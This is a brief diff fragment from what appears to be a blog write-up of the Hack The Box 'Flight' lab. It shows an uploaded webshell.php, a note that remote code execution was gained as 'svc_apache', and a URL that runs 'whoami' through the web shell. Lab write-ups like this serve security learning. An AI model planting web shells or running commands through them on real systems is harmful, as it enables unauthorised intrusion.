duskb1t/duskb1t.github.io/_posts/flight/2024-05-08-htb-flight.md

   webshell.php                        A      101  Wed May  8 05:07:59 2024
 ```

-Unfortunately, this web service is running as svc_apache.
+Unfortunately, this web service is running as 'svc_apache'.
 At least we managed to get RCE.

 ```
 http://flight.htb/webshell.php?fc8358bcf09e4b3947d1975622a9df14=whoami